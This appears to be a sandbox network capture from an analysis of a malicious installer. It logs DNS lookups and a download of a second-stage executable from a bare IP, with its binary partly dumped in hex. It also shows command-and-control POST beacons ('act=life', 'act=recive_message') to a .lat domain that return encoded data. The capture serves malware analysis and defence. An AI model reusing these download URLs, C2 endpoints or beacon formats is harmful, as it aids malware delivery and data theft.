Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 18, 2024 13:49:23.997487068 CET	1.1.1.1	192.168.2.8	0x189d	No error (0)	post-to-me.com	172.67.179.207	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:49:23.997487068 CET	1.1.1.1	192.168.2.8	0x189d	No error (0)	post-to-me.com	104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:49:31.994019985 CET	1.1.1.1	192.168.2.8	0xb75c	No error (0)	rapeflowwj.lat	172.67.220.223	A (IP address)	IN (0x0001)	false
Dec 18, 2024 13:49:31.994019985 CET	1.1.1.1	192.168.2.8	0xb75c	No error (0)	rapeflowwj.lat	104.21.24.223	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

rapeflowwj.lat

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49705	176.113.115.19	80	6664	C:\Users\user\Desktop\InstallSetup.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:49:26.399105072 CET	85	OUT	GET /ScreenUpdateSync.exe HTTP/1.1 User-Agent: ShareScreen Host: 176.113.115.19
Dec 18, 2024 13:49:27.726911068 CET	1236	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:27 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Wed, 18 Dec 2024 12:45:01 GMT ETag: "59e00-6298ac83d9e2c" Accept-Ranges: bytes Content-Length: 368128 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 77 42 b3 41 33 23 dd 12 33 23 dd 12 33 23 dd 12 8e 6c 4b 12 32 23 dd 12 2d 71 59 12 2d 23 dd 12 2d 71 48 12 27 23 dd 12 2d 71 5e 12 5d 23 dd 12 14 e5 a6 12 36 23 dd 12 33 23 dc 12 40 23 dd 12 2d 71 57 12 32 23 dd 12 2d 71 49 12 32 23 dd 12 2d 71 4c 12 32 23 dd 12 52 69 63 68 33 23 dd 12 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 58 67 5f 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 f4 03 00 00 2a 3f 00 00 00 00 00 04 1a 00 00 00 10 00 00 00 10 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 30 43 00 00 04 00 00 fd 10 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$wBA3#3#3#lK2#-qY-#-qH'#-q^]#6#3#@#-qW2#-qI2#-qL2#Rich3#PELXg_e*?@0C(<B.text `.rdata!"@@.data=@p@.rsrcB@@
Dec 18, 2024 13:49:27.726962090 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 25 64 10 44 00 3b 0d 04 40 44 00 75 02 f3 c3 e9 f9 09 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 Data Ascii: %dD;@DuUQeVEPuupu9EttM^jh$Deu;5w"jYeVYEEEjYUVuSW
Dec 18, 2024 13:49:27.727119923 CET	1236	IN	Data Raw: 8b 3d 9c 10 44 00 83 3d 8c 6f 44 00 00 75 18 e8 63 1f 00 00 6a 1e e8 b1 1d 00 00 68 ff 00 00 00 e8 f3 1a 00 00 59 59 a1 78 b4 81 00 83 f8 01 75 0e 85 f6 74 04 8b c6 eb 03 33 c0 40 50 eb 1c 83 f8 03 75 0b 56 e8 53 ff ff ff 59 85 c0 75 16 85 f6 75 Data Ascii: =D=oDucjhYYxut3@PuVSYuuFVj5oDu.j^9rDtuAYtu{00_[VY3^]jh%D3}3u;;u WWWWW%
Dec 18, 2024 13:49:27.727166891 CET	1236	IN	Data Raw: 00 0f 85 46 ff ff ff e9 55 ff ff ff 33 c0 85 f6 0f 95 c0 33 ff 47 50 8b 45 f0 56 57 53 6a 09 ff 70 04 ff 15 a0 10 44 00 85 c0 0f 84 34 ff ff ff 8b 45 08 85 c0 0f 84 cb fe ff ff 89 38 e9 c4 fe ff ff 8b 45 08 3b c1 74 02 89 08 33 c0 5f c9 c3 8b ff Data Ascii: FU33GPEVWSjpD4E8E;t3_UQMES]VtukDujuukDjjD3MQE^[Ujju4]jh@%D]uuGYuuS%8Y=x
Dec 18, 2024 13:49:27.727180958 CET	448	IN	Data Raw: 8c 2d f4 6b 44 00 9c 8f 05 28 6c 44 00 8b 45 00 a3 1c 6c 44 00 8b 45 04 a3 20 6c 44 00 8d 45 08 a3 2c 6c 44 00 8b 85 e0 fc ff ff c7 05 68 6b 44 00 01 00 01 00 a1 20 6c 44 00 a3 1c 6b 44 00 c7 05 10 6b 44 00 09 04 00 c0 c7 05 14 6b 44 00 01 00 00 Data Ascii: -kD(lDElDE lDE,lDhkD lDkDkDkD@D@DD`kDj;YjDhDD=`kDuj;YhDPDUE3;@DtA-rHwjX]@D]DjY;#
Dec 18, 2024 13:49:27.727324963 CET	1236	IN	Data Raw: 59 89 7d fc ff 75 08 e8 1f 0a 00 00 59 89 45 e4 c7 45 fc fe ff ff ff e8 5f 00 00 00 8b 5d e4 3b df 74 11 ff 75 08 57 53 e8 43 3a 00 00 83 c4 0c 3b df 75 61 56 6a 08 ff 35 8c 6f 44 00 ff 15 9c 10 44 00 8b d8 3b df 75 4c 39 3d e0 72 44 00 74 33 56 Data Ascii: Y}uYEE_];tuWSC:;uaVj5oDD;uL9=rDt3VYrE;PE3ujY;uE;tVW38nD<ADuAD8h0/:YYtF$\|3@_^$AD3SDV
Dec 18, 2024 13:49:27.727339029 CET	1236	IN	Data Raw: 00 00 80 d3 ea 09 50 08 a1 88 6f 44 00 8b 40 10 8b 0d 94 b4 81 00 83 a4 88 c4 00 00 00 00 a1 88 6f 44 00 8b 40 10 fe 48 43 a1 88 6f 44 00 8b 48 10 80 79 43 00 75 09 83 60 04 fe a1 88 6f 44 00 83 78 08 ff 75 65 53 6a 00 ff 70 0c ff d6 a1 88 6f 44 Data Ascii: PoD@oD@HCoDHyCu`oDxueSjpoDpj5oDDoDk+LQHQP6E;oDvmEoD=[_^V5W3;u4kP5W5oDD;u3x
Dec 18, 2024 13:49:27.727382898 CET	1236	IN	Data Raw: f1 8b 79 04 89 4b 08 89 7b 04 89 59 04 8b 4b 04 89 59 08 8b 4b 04 3b 4b 08 75 57 8a 4c 06 04 88 4d 0f fe c1 88 4c 06 04 83 fe 20 73 1c 80 7d 0f 00 75 0e 8b ce bf 00 00 00 80 d3 ef 8b 4d 08 09 39 8d 44 90 44 8b ce eb 20 80 7d 0f 00 75 10 8d 4e e0 Data Ascii: yK{YKYK;KuWLML s}uM9DD }uNMyNED3@_^[UMkMSI VW}M3US;#U#u];r;u
Dec 18, 2024 13:49:27.727395058 CET	1236	IN	Data Raw: 7c b4 81 00 83 c4 08 8b 4d 0c e8 5f 31 00 00 8b 45 0c 39 58 0c 74 12 68 04 40 44 00 57 8b d3 8b c8 e8 62 31 00 00 8b 45 0c 8b 4d f8 89 48 0c 8b 06 83 f8 fe 74 0d 8b 4e 04 03 cf 33 0c 38 e8 27 e5 ff ff 8b 4e 0c 8b 56 08 03 cf 33 0c 3a e8 17 e5 ff Data Ascii: \|M_1E9Xth@DWb1EMHtN38'NV3:EH09SRh@DW1U39EjhPDoDu]3@x]UWWDu(D`wt_]Uu
Dec 18, 2024 13:49:27.727406025 CET	328	IN	Data Raw: 03 b9 dc 72 44 00 68 94 17 44 00 2b c8 51 50 e8 81 32 00 00 83 c4 14 85 c0 74 11 33 f6 56 56 56 56 56 e8 7d 06 00 00 83 c4 14 eb 02 33 f6 68 90 17 44 00 53 57 e8 e7 31 00 00 83 c4 0c 85 c0 74 0d 56 56 56 56 56 e8 59 06 00 00 83 c4 14 8b 45 fc ff Data Ascii: rDhD+QP2t3VVVVV}3hDSW1tVVVVVYE4BDSW1tVVVVV4h hhDW502jD;t$tjEP4BD62YP6SD_^[j}3Ytjp3Yu=@Duh)h
Dec 18, 2024 13:49:27.847012997 CET	1236	IN	Data Raw: 06 3b c6 7d 07 8b c6 a3 60 b4 81 00 6a 04 50 e8 78 0c 00 00 59 59 a3 40 a4 81 00 85 c0 75 1e 6a 04 56 89 35 60 b4 81 00 e8 5f 0c 00 00 59 59 a3 40 a4 81 00 85 c0 75 05 6a 1a 58 5e c3 33 d2 b9 60 43 44 00 eb 05 a1 40 a4 81 00 89 0c 02 83 c1 20 83 Data Ascii: ;}`jPxYY@ujV5`_YY@ujX^3`CD@ ED\|j^3pCDW@t;tu1 BCD\|_3^4=oDt25@!YUVu`CD;r"EDw+QNY

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49704	172.67.179.207	443	6664	C:\Users\user\Desktop\InstallSetup.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:25 UTC	90	OUT	GET /track_prt.php?sub=0&cc=DE HTTP/1.1 User-Agent: ShareScreen Host: post-to-me.com
2024-12-18 12:49:26 UTC	802	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:25 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/5.4.16 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DeIkCXZlrXOfJirl2%2BEixumLQFFtqp6dCB%2Fvf2Bdk%2BpbeToBX1MreWbKTlxomXnRMnIbzRn%2BXQjgYC7FBSqact4NtAsMEVrVEaIK7PmMihWKaWczfLIVM4O2m25go4Xjfg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f45d829654400-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2045&min_rtt=2042&rtt_var=773&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1408586&cwnd=155&unsent_bytes=0&cid=f872e2f78a24a573&ts=919&x=0"
2024-12-18 12:49:26 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 12:49:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.8	49706	172.67.220.223	443	3032	C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:33 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: rapeflowwj.lat
2024-12-18 12:49:33 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-18 12:49:33 UTC	1031	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=si4jkb63r39s0gac9cq6j63i5j; expires=Sun, 13-Apr-2025 06:36:12 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JWqNLKyQXSTo1OOy8sa9czg0gs6XgvnVm3rtMgYXhY5Sty8IxnOi289obss8po30qIsjpDm6LEK4rUFWuXAepm%2FmMdMM6DjUQ6M8KirHS5UjHUy69PndMjZTulZ7FFEg3A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f4608ab1842f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1719&min_rtt=1719&rtt_var=859&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4208&recv_bytes=905&delivery_rate=177432&cwnd=231&unsent_bytes=0&cid=899f79afac1510e0&ts=751&x=0"
2024-12-18 12:49:33 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-18 12:49:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.8	49707	172.67.220.223	443	3032	C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 12:49:35 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 74 Host: rapeflowwj.lat
2024-12-18 12:49:35 UTC	74	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66 Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
2024-12-18 12:49:36 UTC	1038	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 12:49:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=imj4vmih9o6234g9ea1bs76f6i; expires=Sun, 13-Apr-2025 06:36:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dyz5wtJN6w7G5%2BuSNKnGBbA8tDV9lWAHwUAnrB7YlEw4PkHf4UyXWj2GPFkNzbPgIn3lqzElfPzBhQ5j%2B3eoW2%2F9AhDR2YK5KGvQKc0rphKmg8zBaCUw%2FQtArn93jm0Sbw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3f4614eff1439a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1783&min_rtt=1779&rtt_var=675&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=972&delivery_rate=1611479&cwnd=233&unsent_bytes=0&cid=72a6336eee7966da&ts=832&x=0"
2024-12-18 12:49:36 UTC	331	IN	Data Raw: 31 64 33 34 0d 0a 55 74 77 78 6b 43 70 61 2f 78 4e 44 44 79 54 66 79 69 4f 59 54 66 6b 52 48 69 73 34 5a 4d 42 33 7a 56 2b 36 73 4f 74 62 71 64 30 70 2f 6b 65 79 45 47 37 54 4d 54 42 71 42 75 57 2b 55 65 30 6f 31 54 4e 2f 54 78 70 65 70 68 61 68 4c 4e 2b 63 79 53 33 45 2f 32 69 36 55 50 78 5a 50 39 4d 78 4a 6e 63 47 35 5a 46 59 75 69 69 58 4d 79 51 4a 58 51 36 69 46 71 45 39 32 39 75 45 4b 38 57 2b 4f 72 42 57 2b 45 38 35 6d 33 49 76 59 6b 47 36 72 30 4c 79 49 35 42 38 64 6b 59 61 53 4f 49 53 74 33 32 41 6b 71 59 2b 33 62 77 66 76 55 4c 37 43 43 66 54 61 47 46 71 53 76 33 77 41 66 6b 6f 6d 33 31 34 54 31 4d 4d 71 42 2b 70 50 4e 37 61 6d 7a 4c 50 74 54 71 2b 56 66 6c 46 4d 49 39 2f 4a 57 56 4b 76 4b 56 43 75 6d 48 62 64 47 51 4a 41 6b 62 78 4a 36 77 73 79 Data Ascii: 1d34UtwxkCpa/xNDDyTfyiOYTfkRHis4ZMB3zV+6sOtbqd0p/keyEG7TMTBqBuW+Ue0o1TN/TxpephahLN+cyS3E/2i6UPxZP9MxJncG5ZFYuiiXMyQJXQ6iFqE929uEK8W+OrBW+E85m3IvYkG6r0LyI5B8dkYaSOISt32AkqY+3bwfvUL7CCfTaGFqSv3wAfkom314T1MMqB+pPN7amzLPtTq+VflFMI9/JWVKvKVCumHbdGQJAkbxJ6wsy
2024-12-18 12:49:36 UTC	1369	IN	Data Raw: 6c 6b 53 72 77 54 76 49 70 62 4c 79 54 37 48 2f 32 6a 2b 56 66 78 4a 4e 5a 31 6a 4b 57 5a 4e 75 4c 70 4b 38 79 4b 57 63 33 46 44 56 51 57 69 45 71 55 33 31 39 69 4e 4e 4d 61 35 4d 4c 34 54 76 41 67 2f 68 54 46 35 4c 57 57 34 75 45 62 32 4f 64 6c 4a 50 46 59 55 48 2b 49 53 6f 33 32 41 6b 6f 45 38 79 4c 77 37 73 56 44 36 51 79 71 64 59 79 64 67 51 36 2b 75 52 50 51 6c 6d 47 46 32 52 31 77 46 71 78 36 6d 4f 4e 2f 57 79 58 65 4c 75 43 6a 2b 43 37 4a 70 4e 5a 5a 39 4b 33 70 47 2f 62 63 50 34 32 2b 63 66 7a 77 52 47 67 4b 6a 45 61 34 35 31 74 79 4e 4e 63 32 78 50 62 46 56 2b 45 67 2f 6c 33 6b 70 62 45 75 32 70 30 48 2f 49 70 39 31 63 45 68 66 52 75 78 56 71 43 57 59 69 73 6b 58 7a 4c 77 69 2f 47 62 78 52 6a 61 61 5a 32 46 79 43 4b 54 6f 52 76 5a 76 77 7a 4e 79 Data Ascii: lkSrwTvIpbLyT7H/2j+VfxJNZ1jKWZNuLpK8yKWc3FDVQWiEqU319iNNMa5ML4TvAg/hTF5LWW4uEb2OdlJPFYUH+ISo32AkoE8yLw7sVD6QyqdYydgQ6+uRPQlmGF2R1wFqx6mON/WyXeLuCj+C7JpNZZ9K3pG/bcP42+cfzwRGgKjEa451tyNNc2xPbFV+Eg/l3kpbEu2p0H/Ip91cEhfRuxVqCWYiskXzLwi/GbxRjaaZ2FyCKToRvZvwzNy
2024-12-18 12:49:36 UTC	1369	IN	Data Raw: 4a 62 37 7a 72 41 6b 74 46 35 2b 71 67 37 2f 47 62 78 52 6a 61 61 5a 32 46 79 43 4b 54 6f 52 76 5a 76 77 7a 4e 78 51 56 38 44 72 52 53 6c 4d 39 33 59 68 54 48 46 76 43 4b 78 56 2f 4a 45 4d 4a 64 38 4c 32 6c 4f 74 4b 4e 4b 2f 43 2b 61 65 54 77 48 47 67 47 36 56 66 64 39 37 4e 57 46 4e 4d 54 39 42 62 31 64 2f 45 38 75 33 57 35 76 64 41 61 36 70 41 47 69 62 35 64 36 66 45 4a 51 41 71 49 53 6f 6a 6a 62 31 59 6f 30 7a 4c 55 2b 75 56 66 2b 51 54 57 62 63 53 5a 70 51 36 2b 74 53 50 59 6a 32 7a 30 38 54 6b 4a 47 2b 6c 57 41 4f 73 37 52 70 6a 72 61 74 6e 43 68 48 65 73 49 50 35 45 78 65 53 31 42 75 4b 42 4b 2f 43 65 62 59 58 6c 48 55 51 65 6f 45 36 34 77 31 4e 53 4a 4f 4d 75 35 50 4c 35 55 39 56 6f 71 6d 48 63 7a 5a 77 62 7a 36 45 62 69 62 38 4d 7a 53 6c 6c 4e 46 Data Ascii: Jb7zrAktF5+qg7/GbxRjaaZ2FyCKToRvZvwzNxQV8DrRSlM93YhTHFvCKxV/JEMJd8L2lOtKNK/C+aeTwHGgG6Vfd97NWFNMT9Bb1d/E8u3W5vdAa6pAGib5d6fEJQAqISojjb1Yo0zLU+uVf+QTWbcSZpQ6+tSPYj2z08TkJG+lWAOs7RpjratnChHesIP5ExeS1BuKBK/CebYXlHUQeoE64w1NSJOMu5PL5U9VoqmHczZwbz6Ebib8MzSllNF
2024-12-18 12:49:36 UTC	1369	IN	Data Raw: 30 31 39 71 42 4e 73 53 37 50 72 68 56 2f 30 30 33 6c 32 4d 70 59 30 75 32 70 30 72 6f 4c 35 5a 33 63 45 31 53 44 61 68 56 34 58 33 66 79 73 6c 68 69 34 6f 39 73 56 50 78 58 6e 69 43 50 7a 67 74 51 62 48 6f 47 62 6f 6a 6c 58 4e 7a 52 56 59 4e 71 68 53 6a 4d 39 2f 58 67 44 48 44 72 54 47 36 57 2f 4e 47 4e 35 78 31 4a 47 68 43 75 71 78 48 39 57 2f 56 4d 33 74 52 47 6c 37 69 4f 6f 67 49 6d 76 4f 7a 65 64 54 78 4b 66 35 55 2f 67 68 67 33 58 30 69 59 55 36 79 72 6b 6a 32 4a 5a 4a 34 63 45 4a 65 43 71 73 51 71 54 7a 64 31 34 67 39 78 37 55 32 76 56 44 39 52 7a 65 56 4d 57 38 74 51 61 58 6f 47 62 6f 4b 6a 48 68 79 54 78 6f 5a 37 41 7a 76 4f 74 53 53 30 58 6e 48 74 6a 61 34 56 76 35 4a 50 70 56 30 4b 57 6c 48 75 36 35 43 39 53 75 65 63 6e 4e 4e 56 67 69 6f 46 4b Data Ascii: 019qBNsS7PrhV/003l2MpY0u2p0roL5Z3cE1SDahV4X3fyslhi4o9sVPxXniCPzgtQbHoGbojlXNzRVYNqhSjM9/XgDHDrTG6W/NGN5x1JGhCuqxH9W/VM3tRGl7iOogImvOzedTxKf5U/ghg3X0iYU6yrkj2JZJ4cEJeCqsQqTzd14g9x7U2vVD9RzeVMW8tQaXoGboKjHhyTxoZ7AzvOtSS0XnHtja4Vv5JPpV0KWlHu65C9SuecnNNVgioFK
2024-12-18 12:49:36 UTC	1369	IN	Data Raw: 6d 7a 37 45 75 7a 65 79 56 66 31 4f 4f 5a 68 37 4c 57 70 44 74 71 64 4e 75 6d 48 62 64 47 51 4a 41 6b 61 4d 48 72 77 71 32 39 79 43 4c 39 44 2f 4c 2f 42 4b 73 6b 38 30 33 53 6c 68 62 6b 32 32 72 45 48 32 4c 35 39 2b 66 46 74 56 41 61 55 63 70 43 2f 53 31 59 34 79 77 37 51 2f 75 45 48 2b 52 69 71 59 59 7a 4d 74 43 50 32 76 57 62 70 33 32 30 56 37 57 55 6f 46 34 43 53 35 50 73 37 5a 68 44 57 4c 6f 48 36 6e 45 2f 56 45 65 4d 55 78 4a 32 4a 50 76 71 64 41 38 79 4f 57 64 6e 56 4d 57 77 43 6d 48 36 55 39 33 74 53 49 50 4d 47 38 4d 62 52 61 39 55 41 2f 6e 6d 4e 68 49 77 61 36 73 41 47 69 62 37 4a 30 62 6b 64 4b 52 72 31 62 74 6e 33 66 33 73 6c 68 69 37 73 36 73 56 66 31 52 44 36 59 64 79 78 73 53 62 79 6f 54 76 34 6b 6b 6e 56 39 52 46 38 4c 70 67 65 6c 4e 74 66 Data Ascii: mz7EuzeyVf1OOZh7LWpDtqdNumHbdGQJAkaMHrwq29yCL9D/L/BKsk803Slhbk22rEH2L59+fFtVAaUcpC/S1Y4yw7Q/uEH+RiqYYzMtCP2vWbp320V7WUoF4CS5Ps7ZhDWLoH6nE/VEeMUxJ2JPvqdA8yOWdnVMWwCmH6U93tSIPMG8MbRa9UA/nmNhIwa6sAGib7J0bkdKRr1btn3f3slhi7s6sVf1RD6YdyxsSbyoTv4kknV9RF8LpgelNtf
2024-12-18 12:49:36 UTC	1369	IN	Data Raw: 37 55 31 74 46 37 78 52 7a 75 50 63 43 64 2f 52 72 43 69 55 2f 41 6b 6e 6e 35 78 52 46 6b 41 70 42 36 6a 4c 39 48 53 69 6a 4b 4c 38 58 43 35 53 37 49 51 65 4c 35 6d 4e 32 64 42 73 62 35 4b 2b 79 79 4e 66 6d 77 4a 46 45 61 7a 45 72 35 39 67 4d 53 5a 4c 73 79 67 66 71 63 54 39 55 52 34 78 54 45 6e 5a 45 43 36 72 6b 2f 6f 4b 70 31 38 63 30 42 54 41 71 6f 57 72 7a 6e 63 31 59 77 36 78 37 51 33 76 56 7a 32 51 54 61 55 66 6d 45 6a 42 72 71 77 41 61 4a 76 75 6d 68 2f 52 56 64 47 76 56 75 32 66 64 2f 65 79 57 47 4c 73 7a 36 37 55 2f 68 4f 50 4a 68 33 4b 32 68 47 74 71 74 4f 2f 69 6d 66 66 48 78 43 55 77 65 6b 45 4b 55 32 33 74 2b 4b 50 38 33 2f 66 76 35 55 36 67 68 67 33 56 45 36 59 45 71 36 36 46 36 30 4e 74 74 30 63 41 6b 43 52 71 6b 5a 71 7a 72 59 33 34 6f 78 Data Ascii: 7U1tF7xRzuPcCd/RrCiU/Aknn5xRFkApB6jL9HSijKL8XC5S7IQeL5mN2dBsb5K+yyNfmwJFEazEr59gMSZLsygfqcT9UR4xTEnZEC6rk/oKp18c0BTAqoWrznc1Yw6x7Q3vVz2QTaUfmEjBrqwAaJvumh/RVdGvVu2fd/eyWGLsz67U/hOPJh3K2hGtqtO/imffHxCUwekEKU23t+KP83/fv5U6ghg3VE6YEq66F60Ntt0cAkCRqkZqzrY34ox
2024-12-18 12:49:36 UTC	308	IN	Data Raw: 56 43 35 45 55 6f 6d 6a 45 65 49 77 61 6c 36 42 6d 36 47 70 68 39 63 6b 35 4d 46 2b 38 79 75 54 66 66 77 6f 34 75 78 50 39 2b 2f 6c 57 79 45 47 76 54 4d 53 56 38 42 75 58 34 45 36 46 36 79 43 51 73 47 30 56 49 75 31 57 35 66 59 43 41 78 33 6e 5a 2f 32 6a 2b 46 50 46 61 4b 70 74 79 4e 32 34 42 67 35 5a 6d 34 43 4b 64 5a 47 31 33 5a 41 47 34 47 4b 6b 71 79 5a 36 63 4f 73 57 78 4e 36 67 54 76 41 67 33 33 53 6b 59 4c 51 37 39 6c 77 2b 36 4e 39 73 72 50 48 78 5a 43 4b 77 53 75 53 79 56 39 5a 4d 30 7a 61 67 68 2f 68 32 79 54 6e 6a 46 49 57 38 74 51 71 7a 6f 47 61 70 39 77 43 59 76 48 67 70 55 76 56 75 32 66 63 36 53 30 57 75 46 2f 79 4c 2b 43 37 49 50 4f 34 39 6a 4a 32 35 51 76 75 39 2f 78 41 47 63 64 58 6c 4f 53 6b 53 4d 48 72 73 36 6d 4a 7a 4a 4e 6f 76 6e 43 Data Ascii: VC5EUomjEeIwal6Bm6Gph9ck5MF+8yuTffwo4uxP9+/lWyEGvTMSV8BuX4E6F6yCQsG0VIu1W5fYCAx3nZ/2j+FPFaKptyN24Bg5Zm4CKdZG13ZAG4GKkqyZ6cOsWxN6gTvAg33SkYLQ79lw+6N9srPHxZCKwSuSyV9ZM0zagh/h2yTnjFIW8tQqzoGap9wCYvHgpUvVu2fc6S0WuF/yL+C7IPO49jJ25Qvu9/xAGcdXlOSkSMHrs6mJzJNovnC
2024-12-18 12:49:36 UTC	1369	IN	Data Raw: 33 30 61 30 0d 0a 64 54 41 74 48 75 33 36 47 71 39 38 7a 43 4d 75 56 68 51 66 34 67 50 76 5a 59 71 63 79 53 75 4c 35 33 44 35 55 4f 42 61 50 70 35 6e 49 69 70 34 67 36 74 58 39 79 43 51 63 6b 4a 33 64 41 75 6a 46 71 46 2f 36 63 53 45 4b 63 69 36 4e 34 42 74 2f 45 38 73 6d 6e 38 6e 62 51 62 7a 36 45 36 36 64 36 49 7a 4e 41 6c 6c 53 4f 49 4e 37 32 57 59 35 34 6f 33 78 62 67 6d 72 78 37 52 58 6a 57 53 65 69 41 74 43 50 32 75 41 61 4a 2f 31 54 4e 34 57 42 70 65 38 6b 66 30 61 49 75 46 32 57 76 55 38 53 6e 2b 52 62 49 51 61 74 4d 78 4d 79 30 65 2f 65 39 50 39 79 36 59 66 58 39 62 53 41 43 68 41 36 78 36 35 75 79 6f 4e 4d 43 7a 50 62 46 59 7a 48 59 5a 6b 48 6f 74 59 45 6d 32 6c 6e 2f 76 4c 4a 56 39 65 31 39 4c 52 75 78 56 6f 48 32 41 36 38 6c 78 69 34 42 2b 2f Data Ascii: 30a0dTAtHu36Gq98zCMuVhQf4gPvZYqcySuL53D5UOBaPp5nIip4g6tX9yCQckJ3dAujFqF/6cSEKci6N4Bt/E8smn8nbQbz6E66d6IzNAllSOIN72WY54o3xbgmrx7RXjWSeiAtCP2uAaJ/1TN4WBpe8kf0aIuF2WvU8Sn+RbIQatMxMy0e/e9P9y6YfX9bSAChA6x65uyoNMCzPbFYzHYZkHotYEm2ln/vLJV9e19LRuxVoH2A68lxi4B+/
